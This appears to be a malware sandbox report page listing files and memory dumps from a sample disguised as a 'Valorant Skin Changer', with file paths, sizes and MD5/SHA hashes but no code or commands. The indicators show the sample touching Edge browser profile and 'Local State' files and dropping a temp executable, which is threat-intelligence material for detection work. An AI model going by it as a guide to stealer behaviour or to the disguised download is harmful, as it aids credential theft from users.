ffe48f1904d19616f4240d0f8b64d12d127955c06fc7ad2151e5c9604e9733bdad5d743c6593187ac4d99cb99a71c9f760a6cd72697a4b07926881f9ec75078e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
9af8d497d80fb1bf6d23583ea1baf314

SHA1
60f7daef4fd8b4d74bd1972065e502b18e4fe42c

SHA256
f13d8b66f7f73aa447ea7ba8876c7481679dc8a3f34d76fb05ba18037bb727ce

SHA512
72eccdb7f43170d229d60a76812e363fdd87048e75224a20c719b9b1078bfe77bca4bc7e1456f3759d4b406a12b39db8a09e9006164aab0b149101993ac38e31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b3ffa6533ede876d3a9ab4888aaebb76

SHA1
a80f0d7c217c1889eaa9f95409c381faaccac7c6

SHA256
9e5bcab71f871f5e7ec7386e7eafdcb23919b3560b704f09334b4c7f8037fd03

SHA512
0a0b51de273b4de487b3c9aea20d3048fe1cb68de788141f06a7f5154daa4622fa24654642f7e7c96930f56d484dc1b64ea33e3634539eaf41e2011c8a9c57ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
a7f5ef36be4c55450cb1c73f6d0a615d

SHA1
2e36f13bdc58565dc786a6185d04e9ac0a15b116

SHA256
cf2d4591fe48814452387b5b841bf822d990f9143c86e193d6e6918b212de6ae

SHA512
dafbacead546e2e38a73d64bdfe538ecda954816a01cf4fa6d4e71b1f1ee81e13f0717af886bbf0b154aa6fafab9a67a0db146e13d8cf3fc6a5d8a96a1d854bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
7404ee509fcbf8f2274a9dbf412f8c96

SHA1
af577ca14baa8c7da8e3072f45ee703a333b8e2c

SHA256
53bded501a6a37170c6c73d270b262316198f6fd9c8dbe392f588e70e01cecbb

SHA512
65613959f0cf82aef42556b9e001cf480cd73f33e02668e6dd916a9a50a9fb6f85fd982175b4d47049096144298830627f709a704efff053305e1ff3ccc7d9ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hbyhqc1k.irt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\IVIEWERS.DLL

Filesize
83KB

MD5
55470aea5b9f0cfc5af1bb312638cf47

SHA1
c9b7d95b45fe7f3282d4e76796c66f9c050961b7

SHA256
0e1eed48e5643a9090e8f55f741ae9c322ec9b8fb3c6f6d902a9d977762ec0b5

SHA512
ee001e521670500a645dcff5141d73aafd864c82b4ebb0e4c9f7975e1e25124d92bfa6dc9b6170b1d018697672116920d428e629b66b3cfbeecf93933ef2ef4d

Download Submit
C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\Valorant_Skin_Changer.exe

Filesize
201KB

MD5
2696d944ffbef69510b0c826446fd748

SHA1
e4106861076981799719876019fe5224eac2655c

SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

Download Submit
C:\Windows\Temp\1.exe

Filesize
1.2MB

MD5
40d39e1426b624e504f616d225b8e410

SHA1
d7e633ca620078db8656623b00dddfefc842fe35

SHA256
2e18b0a1b76f84de1008f468cbfb80d95258474e6fa53b20c70da9b974391c9a

SHA512
baf7c93d9ecec4d85923bc7f70378867a82ff8175eb5bb1b20b00121775a201431b880de067980b26af0448c6c83e706b1fb5612e91ca6fbe7f4ea11b6199e25

Download Submit
memory/2236-289-0x0000000006390000-0x00000000063C2000-memory.dmp

Filesize
200KB

Download
memory/2236-308-0x0000000007340000-0x0000000007354000-memory.dmp

Filesize
80KB

Download
memory/2236-286-0x0000000005A30000-0x0000000005D84000-memory.dmp

Filesize
3.3MB

Download
memory/2236-287-0x0000000005DD0000-0x0000000005DEE000-memory.dmp

Filesize
120KB

Download
memory/2236-288-0x0000000005E00000-0x0000000005E4C000-memory.dmp

Filesize
304KB

Download
memory/2236-275-0x0000000005720000-0x0000000005786000-memory.dmp

Filesize
408KB

Download
memory/2236-290-0x000000006F3F0000-0x000000006F43C000-memory.dmp

Filesize
304KB

Download
memory/2236-300-0x00000000063E0000-0x00000000063FE000-memory.dmp

Filesize
120KB

Download
memory/2236-301-0x0000000006FD0000-0x0000000007073000-memory.dmp

Filesize
652KB

Download
memory/2236-303-0x0000000007100000-0x000000000711A000-memory.dmp

Filesize
104KB

Download
memory/2236-302-0x0000000007740000-0x0000000007DBA000-memory.dmp

Filesize
6.5MB

Download
memory/2236-304-0x0000000007170000-0x000000000717A000-memory.dmp

Filesize
40KB

Download
memory/2236-305-0x0000000007380000-0x0000000007416000-memory.dmp

Filesize
600KB

Download
memory/2236-306-0x0000000007300000-0x0000000007311000-memory.dmp

Filesize
68KB

Download
memory/2236-307-0x0000000007330000-0x000000000733E000-memory.dmp

Filesize
56KB

Download
memory/2236-276-0x0000000005790000-0x00000000057F6000-memory.dmp

Filesize
408KB

Download
memory/2236-309-0x0000000007440000-0x000000000745A000-memory.dmp

Filesize
104KB

Download
memory/2236-310-0x0000000007420000-0x0000000007428000-memory.dmp

Filesize
32KB

Download
memory/2236-274-0x0000000004E20000-0x0000000004E42000-memory.dmp

Filesize
136KB

Download
memory/2236-273-0x0000000004F40000-0x0000000005568000-memory.dmp

Filesize
6.2MB

Download
memory/2236-272-0x0000000002810000-0x0000000002846000-memory.dmp

Filesize
216KB

Download
memory/5952-326-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download
memory/5952-327-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download
memory/5952-328-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download
memory/5952-338-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download
memory/5952-337-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download
memory/5952-336-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download
memory/5952-335-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download
memory/5952-334-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download
memory/5952-333-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download
memory/5952-332-0x0000024D5C800000-0x0000024D5C801000-memory.dmp

Filesize
4KB

Download